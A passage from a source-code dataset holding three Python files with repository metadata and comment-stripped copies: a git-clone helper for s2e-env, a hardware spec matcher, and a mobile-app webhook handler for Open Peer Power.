] | 55 | 2019-12-20T03:25:14.000Z | 2022-01-16T07:19:47.000Z | s2e_env/utils/repos.py | weizhou-chaojixx/s2e-env | ba72dac30a6db65f87fea13f275003791fcf4052 | [
"BSD-3-Clause"
] | 2 | 2020-11-02T08:01:00.000Z | 2022-03-27T02:59:18.000Z | s2e_env/utils/repos.py | weizhou-chaojixx/s2e-env | ba72dac30a6db65f87fea13f275003791fcf4052 | [
"BSD-3-Clause"
] | 11 | 2020-08-06T03:59:45.000Z | 2022-02-25T02:31:59.000Z | """
Copyright (c) 2017 Cyberhaven
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import logging
import os
import sys
from sh import git, ErrorReturnCode
from s2e_env import CONSTANTS
from s2e_env.command import CommandError
logger = logging.getLogger(__name__)
def git_clone(git_repo_url, git_repo_dir):
try:
logger.info('Fetching from %s to %s', git_repo_url, git_repo_dir)
git.clone(git_repo_url, git_repo_dir, _out=sys.stdout,
_err=sys.stderr, _fg=True)
except ErrorReturnCode as e:
raise CommandError(e)
def git_clone_to_source(env_path, git_repo):
git_url = CONSTANTS['repos']['url']
git_repo_dir = os.path.join(env_path, 'source', git_repo)
git_repo_url = '%s/%s' % (git_url, git_repo)
git_clone(git_repo_url, git_repo_dir)
logger.success('Fetched %s', git_repo)
| 35.211538 | 78 | 0.761879 |
import logging
import os
import sys
from sh import git, ErrorReturnCode
from s2e_env import CONSTANTS
from s2e_env.command import CommandError
logger = logging.getLogger(__name__)
def git_clone(git_repo_url, git_repo_dir):
try:
logger.info('Fetching from %s to %s', git_repo_url, git_repo_dir)
git.clone(git_repo_url, git_repo_dir, _out=sys.stdout,
_err=sys.stderr, _fg=True)
except ErrorReturnCode as e:
raise CommandError(e)
def git_clone_to_source(env_path, git_repo):
git_url = CONSTANTS['repos']['url']
git_repo_dir = os.path.join(env_path, 'source', git_repo)
git_repo_url = '%s/%s' % (git_url, git_repo)
git_clone(git_repo_url, git_repo_dir)
logger.success('Fetched %s', git_repo)
| true | true |
f70ffae33736b36285853cfb6a7d24af8048216a | 9,322 | py | Python | hardware/matcher.py | jacek-jablonski/hardware | 4447a07609b54ff1a0eea0f07c75030e5752afe2 | [
"Apache-2.0"
] | null | null | null | hardware/matcher.py | jacek-jablonski/hardware | 4447a07609b54ff1a0eea0f07c75030e5752afe2 | [
"Apache-2.0"
] | null | null | null | hardware/matcher.py | jacek-jablonski/hardware | 4447a07609b54ff1a0eea0f07c75030e5752afe2 | [
"Apache-2.0"
] | 1 | 2019-10-05T13:19:25.000Z | 2019-10-05T13:19:25.000Z | #
# Copyright (C) 2013-2015 eNovance SAS <licensing@enovance.com>
#
# Author: Frederic Lepied <frederic.lepied@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
'''Functions to match according to a requirement specification.'''
import ipaddress
import logging
import re
import sys
LOG = logging.getLogger('hardware.matcher')
def _adder(array, index, value):
'Auxiliary function to add a value to an array.'
array[index] = value
def _appender(array, index, value):
'Auxiliary function to append a value to an array.'
try:
array[index].append(value)
except KeyError:
array[index] = [value, ]
def _range(elt, minval, maxval):
'Helper for match_spec.'
return float(elt) >= float(minval) and float(elt) <= float(maxval)
def _gt(left, right):
'Helper for match_spec.'
return float(left) > float(right)
def _ge(left, right):
'Helper for match_spec.'
return float(left) >= float(right)
def _lt(left, right):
'Helper for match_spec.'
return float(left) < float(right)
def _le(left, right):
'Helper for match_spec.'
return float(left) <= float(right)
def _not(_, right):
'Helper for match_spec.'
return not right
def _and(_, left, right):
'Helper for match_spec.'
return left and right
def _or(_, left, right):
'Helper for match_spec.'
return left or right
def _network(left, right):
'Helper for match_spec.'
return ipaddress.IPv4Address(left) in ipaddress.IPv4Network(right)
def _regexp(left, right):
'Helper for match_spec.'
return re.search(right, left) is not None
def _in(elt, *lst):
'Helper for match_spec.'
return elt in lst
_FUNC_REGEXP = re.compile(r'^([^(]+)' # function name
r'\(\s*([^,]+)' # first argument
r'(?:\s*,\s*(.+))?' # remaining optional arguments
r'\)$') # last parenthesis
def _call_func(func, implicit, res):
'Helper function for extract_result and match_spec'
args = [implicit, res.group(2)]
# split the optional arguments if we have some
if res.group(3):
args = args + re.split(r'\s*,\s*', res.group(3))
# remove strings delimiters
args = [x.strip('\'"') for x in args]
# call function
args = [_extract_result(implicit, x) for x in args]
return func(*args)
def _extract_result(implicit, expr):
'Helper function for match_spec'
res = _FUNC_REGEXP.search(expr)
if res:
func_name = '_' + res.group(1)
if func_name in globals():
return _call_func(globals()[func_name], implicit, res)
else:
return expr
else:
return expr
def match_spec(spec, lines, arr, adder=_adder):
'Match a line according to a spec and store variables in <var>.'
# match a line without variable
for idx in range(len(lines)):
if lines[idx] == spec:
res = lines[idx]
del lines[idx]
return res
# match a line with a variable, a function or both
for lidx in range(len(lines)):
line = lines[lidx]
varidx = []
for idx in range(4):
# try to split the variable and function parts if we have both
if spec[idx][0] == '$':
parts = spec[idx].split('=')
if len(parts) == 2:
var, func = parts
matched = False
else:
var = func = spec[idx]
else:
var = func = spec[idx]
# Match a function
if func[-1] == ')':
res = _FUNC_REGEXP.search(func)
if res:
func_name = '_' + res.group(1)
if func_name in globals():
if not _call_func(globals()[func_name],
line[idx], res):
if var == func:
break
else:
if var == func:
continue
matched = True
else:
if var == func:
break
# Match a variable
if ((var == func) or (var != func and matched)) and var[0] == '$':
if adder == _adder and var[1:] in arr:
if arr[var[1:]] != line[idx]:
break
varidx.append((idx, var[1:]))
# Match the full string
elif line[idx] != spec[idx]:
break
else:
for i, var in varidx:
adder(arr, var, line[i])
res = lines[lidx]
del lines[lidx]
return res
return False
def match_all(lines, specs, arr, arr2, debug=False, level=0):
'''Match all lines according to a spec.
Store variables starting with a $ in <arr>. Variables starting with
2 $ like $$vda are stored in arr and arr2.
'''
# Work on a copy of lines to avoid changing the real lines because
# match_spec removes the matched line to not match it again on next
# calls.
lines = list(lines)
specs = list(specs)
copy_arr = dict(arr)
points = []
# Prevent infinit loops
if level == 50:
return False
# Match lines using specs
while len(specs) > 0:
copy_specs = list(specs)
spec = specs.pop(0)
line = match_spec(spec, lines, arr)
if debug:
sys.stderr.write('match_spec: %s %s\n' % (line, spec))
# No match
if not line:
# Backtrack on the backtracking points
while len(points) > 0:
lines, specs, new_arr = points.pop()
if debug:
sys.stderr.write('retrying with: %s\n' %
(new_arr,))
if match_all(lines, specs, new_arr, arr2, debug, level + 1):
# Copy arr back
for k in new_arr:
arr[k] = new_arr[k]
if debug:
sys.stderr.write('success: %d\n' % level)
return True
if level == 0 and debug:
sys.stderr.write('spec: %s not matched\n' % str(spec))
return False
else:
# Store backtraking points when we find a new variable
if arr != copy_arr:
copy_lines = list(lines)
# Put the matching line at the end of the lines
copy_lines.append(line)
points.append((copy_lines, copy_specs, copy_arr))
copy_arr = dict(arr)
if debug:
sys.stderr.write('new var: %s %s\n' % (arr, line))
# Manage $$ variables
for key in arr:
if key[0] == '$':
nkey = key[1:]
arr[nkey] = arr[key]
arr2[nkey] = arr[key]
del arr[key]
return True
def match_multiple(lines, spec, arr):
'Use spec to find all the matching lines and gather variables.'
ret = False
lines = list(lines)
while match_spec(spec, lines, arr, adder=_appender):
ret = True
return ret
def generate_filename_and_macs(items):
'''Generate a file name for a hardware using DMI information.
(product name and version) then if the DMI serial number is
available we use it unless we lookup the first mac address.
As a result, we do have a filename like :
<dmi_product_name>-<dmi_product_version>-{dmi_serial_num|mac_address}
'''
# Duplicate items as it will be modified by match_* functions
hw_items = list(items)
sysvars = {}
sysvars['sysname'] = ''
if match_spec(('system', 'product', 'vendor', '$sysprodvendor'),
hw_items, sysvars):
sysvars['sysname'] += (re.sub(r'\W+', '', sysvars['sysprodvendor']) +
'-')
if match_spec(('system', 'product', 'name', '$sysprodname'),
hw_items, sysvars):
sysvars['sysname'] = re.sub(r'\W+', '', sysvars['sysprodname']) + '-'
# Let's use any existing DMI serial number or take the first mac address
if match_spec(('system', 'product', 'serial', '$sysserial'),
hw_items, sysvars):
sysvars['sysname'] += re.sub(r'\W+', '', sysvars['sysserial']) + '-'
# we always need to have the mac addresses for pxemngr
if match_multiple(hw_items,
('network', '$eth', 'serial', '$serial'),
sysvars):
sysvars['sysname'] += sysvars['serial'][0].replace(':', '-')
else:
LOG.warning('unable to detect network macs')
return sysvars
# matcher.py ends here
| 31.281879 | 78 | 0.548487 |
import ipaddress
import logging
import re
import sys
LOG = logging.getLogger('hardware.matcher')
def _adder(array, index, value):
array[index] = value
def _appender(array, index, value):
try:
array[index].append(value)
except KeyError:
array[index] = [value, ]
def _range(elt, minval, maxval):
return float(elt) >= float(minval) and float(elt) <= float(maxval)
def _gt(left, right):
return float(left) > float(right)
def _ge(left, right):
return float(left) >= float(right)
def _lt(left, right):
return float(left) < float(right)
def _le(left, right):
return float(left) <= float(right)
def _not(_, right):
return not right
def _and(_, left, right):
return left and right
def _or(_, left, right):
return left or right
def _network(left, right):
return ipaddress.IPv4Address(left) in ipaddress.IPv4Network(right)
def _regexp(left, right):
return re.search(right, left) is not None
def _in(elt, *lst):
return elt in lst
_FUNC_REGEXP = re.compile(r'^([^(]+)'
r'\(\s*([^,]+)'
r'(?:\s*,\s*(.+))?'
r'\)$')
def _call_func(func, implicit, res):
args = [implicit, res.group(2)]
if res.group(3):
args = args + re.split(r'\s*,\s*', res.group(3))
args = [x.strip('\'"') for x in args]
# call function
args = [_extract_result(implicit, x) for x in args]
return func(*args)
def _extract_result(implicit, expr):
res = _FUNC_REGEXP.search(expr)
if res:
func_name = '_' + res.group(1)
if func_name in globals():
return _call_func(globals()[func_name], implicit, res)
else:
return expr
else:
return expr
def match_spec(spec, lines, arr, adder=_adder):
# match a line without variable
for idx in range(len(lines)):
if lines[idx] == spec:
res = lines[idx]
del lines[idx]
return res
# match a line with a variable, a function or both
for lidx in range(len(lines)):
line = lines[lidx]
varidx = []
for idx in range(4):
# try to split the variable and function parts if we have both
if spec[idx][0] == '$':
parts = spec[idx].split('=')
if len(parts) == 2:
var, func = parts
matched = False
else:
var = func = spec[idx]
else:
var = func = spec[idx]
# Match a function
if func[-1] == ')':
res = _FUNC_REGEXP.search(func)
if res:
func_name = '_' + res.group(1)
if func_name in globals():
if not _call_func(globals()[func_name],
line[idx], res):
if var == func:
break
else:
if var == func:
continue
matched = True
else:
if var == func:
break
# Match a variable
if ((var == func) or (var != func and matched)) and var[0] == '$':
if adder == _adder and var[1:] in arr:
if arr[var[1:]] != line[idx]:
break
varidx.append((idx, var[1:]))
# Match the full string
elif line[idx] != spec[idx]:
break
else:
for i, var in varidx:
adder(arr, var, line[i])
res = lines[lidx]
del lines[lidx]
return res
return False
def match_all(lines, specs, arr, arr2, debug=False, level=0):
# Work on a copy of lines to avoid changing the real lines because
# match_spec removes the matched line to not match it again on next
# calls.
lines = list(lines)
specs = list(specs)
copy_arr = dict(arr)
points = []
# Prevent infinit loops
if level == 50:
return False
# Match lines using specs
while len(specs) > 0:
copy_specs = list(specs)
spec = specs.pop(0)
line = match_spec(spec, lines, arr)
if debug:
sys.stderr.write('match_spec: %s %s\n' % (line, spec))
# No match
if not line:
# Backtrack on the backtracking points
while len(points) > 0:
lines, specs, new_arr = points.pop()
if debug:
sys.stderr.write('retrying with: %s\n' %
(new_arr,))
if match_all(lines, specs, new_arr, arr2, debug, level + 1):
# Copy arr back
for k in new_arr:
arr[k] = new_arr[k]
if debug:
sys.stderr.write('success: %d\n' % level)
return True
if level == 0 and debug:
sys.stderr.write('spec: %s not matched\n' % str(spec))
return False
else:
# Store backtraking points when we find a new variable
if arr != copy_arr:
copy_lines = list(lines)
# Put the matching line at the end of the lines
copy_lines.append(line)
points.append((copy_lines, copy_specs, copy_arr))
copy_arr = dict(arr)
if debug:
sys.stderr.write('new var: %s %s\n' % (arr, line))
# Manage $$ variables
for key in arr:
if key[0] == '$':
nkey = key[1:]
arr[nkey] = arr[key]
arr2[nkey] = arr[key]
del arr[key]
return True
def match_multiple(lines, spec, arr):
ret = False
lines = list(lines)
while match_spec(spec, lines, arr, adder=_appender):
ret = True
return ret
def generate_filename_and_macs(items):
# Duplicate items as it will be modified by match_* functions
hw_items = list(items)
sysvars = {}
sysvars['sysname'] = ''
if match_spec(('system', 'product', 'vendor', '$sysprodvendor'),
hw_items, sysvars):
sysvars['sysname'] += (re.sub(r'\W+', '', sysvars['sysprodvendor']) +
'-')
if match_spec(('system', 'product', 'name', '$sysprodname'),
hw_items, sysvars):
sysvars['sysname'] = re.sub(r'\W+', '', sysvars['sysprodname']) + '-'
# Let's use any existing DMI serial number or take the first mac address
if match_spec(('system', 'product', 'serial', '$sysserial'),
hw_items, sysvars):
sysvars['sysname'] += re.sub(r'\W+', '', sysvars['sysserial']) + '-'
# we always need to have the mac addresses for pxemngr
if match_multiple(hw_items,
('network', '$eth', 'serial', '$serial'),
sysvars):
sysvars['sysname'] += sysvars['serial'][0].replace(':', '-')
else:
LOG.warning('unable to detect network macs')
return sysvars
# matcher.py ends here
| true | true |
f70ffb5207b57f675a7239f3cd40636f10b65be5 | 15,741 | py | Python | openpeerpower/components/mobile_app/webhook.py | OpenPeerPower/openpeerpower | 940a04a88e8f78e2d010dc912ad6905ae363503c | [
"Apache-2.0"
] | null | null | null | openpeerpower/components/mobile_app/webhook.py | OpenPeerPower/openpeerpower | 940a04a88e8f78e2d010dc912ad6905ae363503c | [
"Apache-2.0"
] | null | null | null | openpeerpower/components/mobile_app/webhook.py | OpenPeerPower/openpeerpower | 940a04a88e8f78e2d010dc912ad6905ae363503c | [
"Apache-2.0"
] | 1 | 2019-04-24T14:10:08.000Z | 2019-04-24T14:10:08.000Z | """Webhook handlers for mobile_app."""
from functools import wraps
import logging
import secrets
from aiohttp.web import HTTPBadRequest, Request, Response, json_response
from nacl.secret import SecretBox
import voluptuous as vol
from openpeerpower.components.binary_sensor import (
DEVICE_CLASSES as BINARY_SENSOR_CLASSES,
)
from openpeerpower.components.device_tracker import (
ATTR_BATTERY,
ATTR_GPS,
ATTR_GPS_ACCURACY,
ATTR_LOCATION_NAME,
)
from openpeerpower.components.frontend import MANIFEST_JSON
from openpeerpower.components.sensor import DEVICE_CLASSES as SENSOR_CLASSES
from openpeerpower.components.zone.const import DOMAIN as ZONE_DOMAIN
from openpeerpower.const import (
ATTR_DOMAIN,
ATTR_SERVICE,
ATTR_SERVICE_DATA,
CONF_WEBHOOK_ID,
HTTP_BAD_REQUEST,
HTTP_CREATED,
)
from openpeerpower.core import EventOrigin
from openpeerpower.exceptions import OpenPeerPowerError, ServiceNotFound, TemplateError
from openpeerpower.helpers import config_validation as cv, device_registry as dr
from openpeerpower.helpers.dispatcher import async_dispatcher_send
from openpeerpower.helpers.template import attach
from openpeerpower.helpers.typing import OpenPeerPowerType
from openpeerpower.util.decorator import Registry
from .const import (
ATTR_ALTITUDE,
ATTR_APP_DATA,
ATTR_APP_VERSION,
ATTR_COURSE,
ATTR_DEVICE_ID,
ATTR_DEVICE_NAME,
ATTR_EVENT_DATA,
ATTR_EVENT_TYPE,
ATTR_MANUFACTURER,
ATTR_MODEL,
ATTR_OS_VERSION,
ATTR_SENSOR_ATTRIBUTES,
ATTR_SENSOR_DEVICE_CLASS,
ATTR_SENSOR_ICON,
ATTR_SENSOR_NAME,
ATTR_SENSOR_STATE,
ATTR_SENSOR_TYPE,
ATTR_SENSOR_TYPE_BINARY_SENSOR,
ATTR_SENSOR_TYPE_SENSOR,
ATTR_SENSOR_UNIQUE_ID,
ATTR_SENSOR_UOM,
ATTR_SPEED,
ATTR_SUPPORTS_ENCRYPTION,
ATTR_TEMPLATE,
ATTR_TEMPLATE_VARIABLES,
ATTR_VERTICAL_ACCURACY,
ATTR_WEBHOOK_DATA,
ATTR_WEBHOOK_ENCRYPTED,
ATTR_WEBHOOK_ENCRYPTED_DATA,
ATTR_WEBHOOK_TYPE,
CONF_CLOUDHOOK_URL,
CONF_REMOTE_UI_URL,
CONF_SECRET,
DATA_CONFIG_ENTRIES,
DATA_DELETED_IDS,
DATA_STORE,
DOMAIN,
ERR_ENCRYPTION_ALREADY_ENABLED,
ERR_ENCRYPTION_NOT_AVAILABLE,
ERR_ENCRYPTION_REQUIRED,
ERR_SENSOR_DUPLICATE_UNIQUE_ID,
ERR_SENSOR_NOT_REGISTERED,
SIGNAL_LOCATION_UPDATE,
SIGNAL_SENSOR_UPDATE,
)
from .helpers import (
_decrypt_payload,
empty_okay_response,
error_response,
registration_context,
safe_registration,
savable_state,
supports_encryption,
webhook_response,
)
_LOGGER = logging.getLogger(__name__)
WEBHOOK_COMMANDS = Registry()
COMBINED_CLASSES = set(BINARY_SENSOR_CLASSES + SENSOR_CLASSES)
SENSOR_TYPES = [ATTR_SENSOR_TYPE_BINARY_SENSOR, ATTR_SENSOR_TYPE_SENSOR]
WEBHOOK_PAYLOAD_SCHEMA = vol.Schema(
{
vol.Required(ATTR_WEBHOOK_TYPE): cv.string,
vol.Required(ATTR_WEBHOOK_DATA, default={}): vol.Any(dict, list),
vol.Optional(ATTR_WEBHOOK_ENCRYPTED, default=False): cv.boolean,
vol.Optional(ATTR_WEBHOOK_ENCRYPTED_DATA): cv.string,
}
)
def validate_schema(schema):
"""Decorate a webhook function with a schema."""
if isinstance(schema, dict):
schema = vol.Schema(schema)
def wrapper(func):
"""Wrap function so we validate schema."""
@wraps(func)
async def validate_and_run(opp, config_entry, data):
"""Validate input and call handler."""
try:
data = schema(data)
except vol.Invalid as ex:
err = vol.humanize.humanize_error(data, ex)
_LOGGER.error("Received invalid webhook payload: %s", err)
return empty_okay_response()
return await func(opp, config_entry, data)
return validate_and_run
return wrapper
async def handle_webhook(
opp: OpenPeerPowerType, webhook_id: str, request: Request
) -> Response:
"""Handle webhook callback."""
if webhook_id in opp.data[DOMAIN][DATA_DELETED_IDS]:
return Response(status=410)
config_entry = opp.data[DOMAIN][DATA_CONFIG_ENTRIES][webhook_id]
try:
req_data = await request.json()
except ValueError:
_LOGGER.warning("Received invalid JSON from mobile_app")
return empty_okay_response(status=HTTP_BAD_REQUEST)
if (
ATTR_WEBHOOK_ENCRYPTED not in req_data
and config_entry.data[ATTR_SUPPORTS_ENCRYPTION]
):
_LOGGER.warning(
"Refusing to accept unencrypted webhook from %s",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(ERR_ENCRYPTION_REQUIRED, "Encryption required")
try:
req_data = WEBHOOK_PAYLOAD_SCHEMA(req_data)
except vol.Invalid as ex:
err = vol.humanize.humanize_error(req_data, ex)
_LOGGER.error("Received invalid webhook payload: %s", err)
return empty_okay_response()
webhook_type = req_data[ATTR_WEBHOOK_TYPE]
webhook_payload = req_data.get(ATTR_WEBHOOK_DATA, {})
if req_data[ATTR_WEBHOOK_ENCRYPTED]:
enc_data = req_data[ATTR_WEBHOOK_ENCRYPTED_DATA]
webhook_payload = _decrypt_payload(config_entry.data[CONF_SECRET], enc_data)
if webhook_type not in WEBHOOK_COMMANDS:
_LOGGER.error("Received invalid webhook type: %s", webhook_type)
return empty_okay_response()
_LOGGER.debug(
"Received webhook payload for type %s: %s", webhook_type, webhook_payload
)
return await WEBHOOK_COMMANDS[webhook_type](opp, config_entry, webhook_payload)
@WEBHOOK_COMMANDS.register("call_service")
@validate_schema(
{
vol.Required(ATTR_DOMAIN): cv.string,
vol.Required(ATTR_SERVICE): cv.string,
vol.Optional(ATTR_SERVICE_DATA, default={}): dict,
}
)
async def webhook_call_service(opp, config_entry, data):
"""Handle a call service webhook."""
try:
await opp.services.async_call(
data[ATTR_DOMAIN],
data[ATTR_SERVICE],
data[ATTR_SERVICE_DATA],
blocking=True,
context=registration_context(config_entry.data),
)
except (vol.Invalid, ServiceNotFound, Exception) as ex:
_LOGGER.error(
"Error when calling service during mobile_app "
"webhook (device name: %s): %s",
config_entry.data[ATTR_DEVICE_NAME],
ex,
)
raise HTTPBadRequest()
return empty_okay_response()
@WEBHOOK_COMMANDS.register("fire_event")
@validate_schema(
{
vol.Required(ATTR_EVENT_TYPE): cv.string,
vol.Optional(ATTR_EVENT_DATA, default={}): dict,
}
)
async def webhook_fire_event(opp, config_entry, data):
"""Handle a fire event webhook."""
event_type = data[ATTR_EVENT_TYPE]
opp.bus.async_fire(
event_type,
data[ATTR_EVENT_DATA],
EventOrigin.remote,
context=registration_context(config_entry.data),
)
return empty_okay_response()
@WEBHOOK_COMMANDS.register("render_template")
@validate_schema(
{
str: {
vol.Required(ATTR_TEMPLATE): cv.template,
vol.Optional(ATTR_TEMPLATE_VARIABLES, default={}): dict,
}
}
)
async def webhook_render_template(opp, config_entry, data):
"""Handle a render template webhook."""
resp = {}
for key, item in data.items():
try:
tpl = item[ATTR_TEMPLATE]
attach(opp, tpl)
resp[key] = tpl.async_render(item.get(ATTR_TEMPLATE_VARIABLES))
except TemplateError as ex:
resp[key] = {"error": str(ex)}
return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("update_location")
@validate_schema(
{
vol.Optional(ATTR_LOCATION_NAME): cv.string,
vol.Required(ATTR_GPS): cv.gps,
vol.Required(ATTR_GPS_ACCURACY): cv.positive_int,
vol.Optional(ATTR_BATTERY): cv.positive_int,
vol.Optional(ATTR_SPEED): cv.positive_int,
vol.Optional(ATTR_ALTITUDE): vol.Coerce(float),
vol.Optional(ATTR_COURSE): cv.positive_int,
vol.Optional(ATTR_VERTICAL_ACCURACY): cv.positive_int,
}
)
async def webhook_update_location(opp, config_entry, data):
"""Handle an update location webhook."""
opp.helpers.dispatcher.async_dispatcher_send(
SIGNAL_LOCATION_UPDATE.format(config_entry.entry_id), data
)
return empty_okay_response()
@WEBHOOK_COMMANDS.register("update_registration")
@validate_schema(
{
vol.Optional(ATTR_APP_DATA, default={}): dict,
vol.Required(ATTR_APP_VERSION): cv.string,
vol.Required(ATTR_DEVICE_NAME): cv.string,
vol.Required(ATTR_MANUFACTURER): cv.string,
vol.Required(ATTR_MODEL): cv.string,
vol.Optional(ATTR_OS_VERSION): cv.string,
}
)
async def webhook_update_registration(opp, config_entry, data):
"""Handle an update registration webhook."""
new_registration = {**config_entry.data, **data}
device_registry = await dr.async_get_registry(opp)
device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
identifiers={(DOMAIN, config_entry.data[ATTR_DEVICE_ID])},
manufacturer=new_registration[ATTR_MANUFACTURER],
model=new_registration[ATTR_MODEL],
name=new_registration[ATTR_DEVICE_NAME],
sw_version=new_registration[ATTR_OS_VERSION],
)
opp.config_entries.async_update_entry(config_entry, data=new_registration)
return webhook_response(
safe_registration(new_registration),
registration=new_registration,
)
@WEBHOOK_COMMANDS.register("enable_encryption")
async def webhook_enable_encryption(opp, config_entry, data):
"""Handle a encryption enable webhook."""
if config_entry.data[ATTR_SUPPORTS_ENCRYPTION]:
_LOGGER.warning(
"Refusing to enable encryption for %s because it is already enabled!",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(
ERR_ENCRYPTION_ALREADY_ENABLED, "Encryption already enabled"
)
if not supports_encryption():
_LOGGER.warning(
"Unable to enable encryption for %s because libsodium is unavailable!",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(ERR_ENCRYPTION_NOT_AVAILABLE, "Encryption is unavailable")
secret = secrets.token_hex(SecretBox.KEY_SIZE)
data = {**config_entry.data, ATTR_SUPPORTS_ENCRYPTION: True, CONF_SECRET: secret}
opp.config_entries.async_update_entry(config_entry, data=data)
return json_response({"secret": secret})
@WEBHOOK_COMMANDS.register("register_sensor")
@validate_schema(
{
vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
vol.Optional(ATTR_SENSOR_DEVICE_CLASS): vol.All(
vol.Lower, vol.In(COMBINED_CLASSES)
),
vol.Required(ATTR_SENSOR_NAME): cv.string,
vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
vol.Optional(ATTR_SENSOR_UOM): cv.string,
vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
}
)
async def webhook_register_sensor(opp, config_entry, data):
"""Handle a register sensor webhook."""
entity_type = data[ATTR_SENSOR_TYPE]
unique_id = data[ATTR_SENSOR_UNIQUE_ID]
unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"
if unique_store_key in opp.data[DOMAIN][entity_type]:
_LOGGER.error("Refusing to re-register existing sensor %s!", unique_id)
return error_response(
ERR_SENSOR_DUPLICATE_UNIQUE_ID,
f"{entity_type} {unique_id} already exists!",
status=409,
)
data[CONF_WEBHOOK_ID] = config_entry.data[CONF_WEBHOOK_ID]
opp.data[DOMAIN][entity_type][unique_store_key] = data
try:
await opp.data[DOMAIN][DATA_STORE].async_save(savable_state(opp))
except OpenPeerPowerError as ex:
_LOGGER.error("Error registering sensor: %s", ex)
return empty_okay_response()
register_signal = "{}_{}_register".format(DOMAIN, data[ATTR_SENSOR_TYPE])
async_dispatcher_send(opp, register_signal, data)
return webhook_response(
{"success": True},
registration=config_entry.data,
status=HTTP_CREATED,
)
@WEBHOOK_COMMANDS.register("update_sensor_states")
@validate_schema(
vol.All(
cv.ensure_list,
[
vol.Schema(
{
vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
}
)
],
)
)
async def webhook_update_sensor_states(opp, config_entry, data):
"""Handle an update sensor states webhook."""
resp = {}
for sensor in data:
entity_type = sensor[ATTR_SENSOR_TYPE]
unique_id = sensor[ATTR_SENSOR_UNIQUE_ID]
unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"
if unique_store_key not in opp.data[DOMAIN][entity_type]:
_LOGGER.error(
"Refusing to update non-registered sensor: %s", unique_store_key
)
err_msg = f"{entity_type} {unique_id} is not registered"
resp[unique_id] = {
"success": False,
"error": {"code": ERR_SENSOR_NOT_REGISTERED, "message": err_msg},
}
continue
entry = opp.data[DOMAIN][entity_type][unique_store_key]
new_state = {**entry, **sensor}
opp.data[DOMAIN][entity_type][unique_store_key] = new_state
safe = savable_state(opp)
try:
await opp.data[DOMAIN][DATA_STORE].async_save(safe)
except OpenPeerPowerError as ex:
_LOGGER.error("Error updating mobile_app registration: %s", ex)
return empty_okay_response()
async_dispatcher_send(opp, SIGNAL_SENSOR_UPDATE, new_state)
resp[unique_id] = {"success": True}
return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_zones")
async def webhook_get_zones(opp, config_entry, data):
"""Handle a get zones webhook."""
zones = [
opp.states.get(entity_id)
for entity_id in sorted(opp.states.async_entity_ids(ZONE_DOMAIN))
]
return webhook_response(zones, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_config")
async def webhook_get_config(opp, config_entry, data):
"""Handle a get config webhook."""
opp_config = opp.config.as_dict()
resp = {
"latitude": opp_config["latitude"],
"longitude": opp_config["longitude"],
"elevation": opp_config["elevation"],
"unit_system": opp_config["unit_system"],
"location_name": opp_config["location_name"],
"time_zone": opp_config["time_zone"],
"components": opp_config["components"],
"version": opp_config["version"],
"theme_color": MANIFEST_JSON["theme_color"],
}
if CONF_CLOUDHOOK_URL in config_entry.data:
resp[CONF_CLOUDHOOK_URL] = config_entry.data[CONF_CLOUDHOOK_URL]
try:
resp[CONF_REMOTE_UI_URL] = opp.components.cloud.async_remote_ui_url()
except opp.components.cloud.CloudNotAvailable:
pass
return webhook_response(resp, registration=config_entry.data)
| 32.12449 | 88 | 0.688711 | from functools import wraps
import logging
import secrets
from aiohttp.web import HTTPBadRequest, Request, Response, json_response
from nacl.secret import SecretBox
import voluptuous as vol
from openpeerpower.components.binary_sensor import (
DEVICE_CLASSES as BINARY_SENSOR_CLASSES,
)
from openpeerpower.components.device_tracker import (
ATTR_BATTERY,
ATTR_GPS,
ATTR_GPS_ACCURACY,
ATTR_LOCATION_NAME,
)
from openpeerpower.components.frontend import MANIFEST_JSON
from openpeerpower.components.sensor import DEVICE_CLASSES as SENSOR_CLASSES
from openpeerpower.components.zone.const import DOMAIN as ZONE_DOMAIN
from openpeerpower.const import (
ATTR_DOMAIN,
ATTR_SERVICE,
ATTR_SERVICE_DATA,
CONF_WEBHOOK_ID,
HTTP_BAD_REQUEST,
